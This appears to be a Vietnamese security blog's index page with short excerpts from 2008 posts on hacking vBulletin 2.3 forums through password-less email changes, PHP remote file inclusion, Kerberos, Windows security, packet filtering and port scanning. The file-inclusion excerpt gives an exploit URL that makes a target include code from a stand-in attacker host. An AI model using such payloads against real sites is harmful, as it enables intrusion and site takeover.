Posted on Tháng Năm 5, 2008 by roseandgun
Cách này áp dụng chung cho tất cả các forum nào không đòi hỏi phải điền mật khẩu khi change email và đây là cách để hack forum vbb 2.3 trở xuống vì trong phiên bản mới 3.0 của vbb đã yêu cầu nhập password khi change email .
Bước 1 : tạo 1 file đặt [...]
Đăng trong: Hacking | Thẻ: Hacking | Leave a Comment »
Posted on Tháng Năm 5, 2008 by roseandgun
1/ Include remote file:
a/ Lỗi đơn giản:
|———BEGIN of test.php——-
<?php
$ex=”/home/www/testsite”;
include(“$ex/index.php”);
[…]
?>
———-END of test.php———|
Đoạn code trên không có vấn đề gì . Nhưng:
|———BEGIN of test.php——-
<?php
include(“$ex/index.php”);
[…]
?>
———-END of test.php———|
__ Bạn nói sao? ừ 100% là trang này đã bị lỗi File include. Chúng ta có thể khai thác bằng cách sữ dụng link sao:
http://www.[target].com/test.php?ex=http://www.[attacker].com/
__ Link này sẽ include file http://www.[attacker].com/index.php. [...]
Đăng trong: Hacking | Thẻ: Hacking | Leave a Comment »
Posted on Tháng Năm 5, 2008 by roseandgun
Bài này chúng tôi sẽ khảo sát nghiên cứu trạng thái ghi của lớp ứng dụng đã được nghiên cứu qua nhiều năm kinh nghiệm trong thực hiện phân tích bảo mật mã nguồn đối với hàng triệu dòng mã.
Việc ghi chép hiệu quả thường bị bỏ qua bởi vấn đề bảo mật ứng [...]
Đăng trong: Security | Thẻ: Security | Leave a Comment »
Posted on Tháng Năm 5, 2008 by roseandgun
Tổng quan về bảo mật cho hệ thống Windows
Một trong những yếu tố quan tâm hàng đầu trong việc Thiết kế Security một hệ thống thông tin đó là kiểm soát chặt chẽ tất cả Computer của tổ chức. Vì chúng là nơi cất giữ tài sản thông tin có giá trị của tổ chức. [...]
Đăng trong: Security | Thẻ: Security | Leave a Comment »
Posted on Tháng Năm 5, 2008 by roseandgun
Kerberos là một giao thức mật mã dùng để xác thực trong các mạng máy tính hoạt động trên những đường truyền không an toàn. Giao thức Kerberos có khả năng chống lại việc nghe lén hay gửi lại các gói tin cũ và đảm bảo tính toàn vẹn của dữ liệu. Mục tiêu khi [...]
Đăng trong: Other | Thẻ: other | Leave a Comment »
Posted on Tháng Năm 5, 2008 by roseandgun
Static fillter packet
Nói chung, một router (bộ định tuyến) là một thiết bị liên mạng chuyên dụng vốn chạy một hệ điều hành chuyên biệt (Ví dụ như Cisco IOS) để chuyển các gói giữa hai hoặc nhiều đoạn mạng được tách biệt. Nó hoạt động tại lớp network của mô hình tham chiếu OSI [...]
Đăng trong: Other | Thẻ: other | Leave a Comment »
Posted on Tháng Năm 5, 2008 by roseandgun
Trong bài viết này tôi trình bày với các bạn các nguyên tắc Scan Port cơ bản trên hệ thống, những kỹ thuật scan từ đó chúng ta biết trên một hệ thống đang sử dụng những Port nào. Từ những khái niệm về Scan tôi cũng trình bày với các bạn giải pháp ngăn [...]
Đăng trong: Other | Thẻ: other | Leave a Comment »